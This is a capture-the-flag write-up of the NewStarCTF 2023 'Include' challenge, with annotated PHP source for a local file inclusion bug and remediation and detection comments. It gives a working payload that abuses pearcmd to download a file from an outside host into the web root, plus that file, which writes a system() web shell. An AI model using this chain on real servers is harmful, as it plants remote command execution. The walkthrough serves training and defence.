# [NewStarCTF 2023 公开赛道] Include 🍐

<?php
    # Challenge source: includes a PHP file whose name is taken from the `file`
    # query parameter, or prints its own source when the parameter is absent.
    # Error output is fully disabled, so a failed include shows nothing to the client.
    error_reporting(0);
    if(isset($_GET['file'])) {
        # Untrusted, client-controlled value; it is used below as part of an include path.
        $file = $_GET['file'];
        
        # Case-insensitive substring denylist. The words presumably target the usual
        # inclusion routes (php://filter, php://input, data:, log files, session files)
        # and the flag file itself.
        # NOTE(review): a denylist cannot enumerate every includable script. Any other
        # path, and any file reachable through include_path, still passes this check.
        if(preg_match('/flag|log|session|filter|input|data/i', $file)) {
            die('hacker!');
        }
        
        # ".php" is appended, so only files ending in .php can be loaded, but the name
        # and directory are otherwise unrestricted: this is a local file inclusion sink.
        # Remediation: look the parameter up in a fixed allowlist of page names and
        # include only the mapped constant path; never concatenate request data into it.
        include($file.".php");
        # Something in phpinfo.php!
        # NOTE(review): presumably the hint points at a php.ini setting visible in the
        # phpinfo output (the payload on this page depends on register_argc_argv being
        # On) - confirm. Disabling register_argc_argv for web SAPIs and removing PEAR
        # from production images reduces what an inclusion bug like this can reach.
    }
    else {
        # No `file` parameter: display this script's own highlighted source.
        highlight_file(__FILE__);
    }
?>

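payload (passes the filter because `pearcmd` is not on the denylist; pearcmd.php takes its arguments from the query string when `register_argc_argv` is On, so turning that setting off or removing PEAR from the image closes this path):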

?f=pearcmd&+install+-R+/var/www/html+http://ip:port/eval.php

image-20250223192533238

image-20250223192547479

eval.php:

<?php 
# File served from the external host named in the payload on this page.
# It runs no command itself: it echoes a literal string of PHP source, so the HTTP
# response body is the text inside the quotes below.
# NOTE(review): presumably that response body is what the install step writes under
# /var/www/html - confirm against the PEAR output in the screenshots.
# Defender note: a .php file in the document root that passes a request parameter to
# system() is a web-shell indicator. Alert on PHP files newly created by the
# web-server user and on outbound HTTP fetches made by the PHP process, and keep the
# document root read-only for that user where possible.
echo '<?php system($_GET[0]);';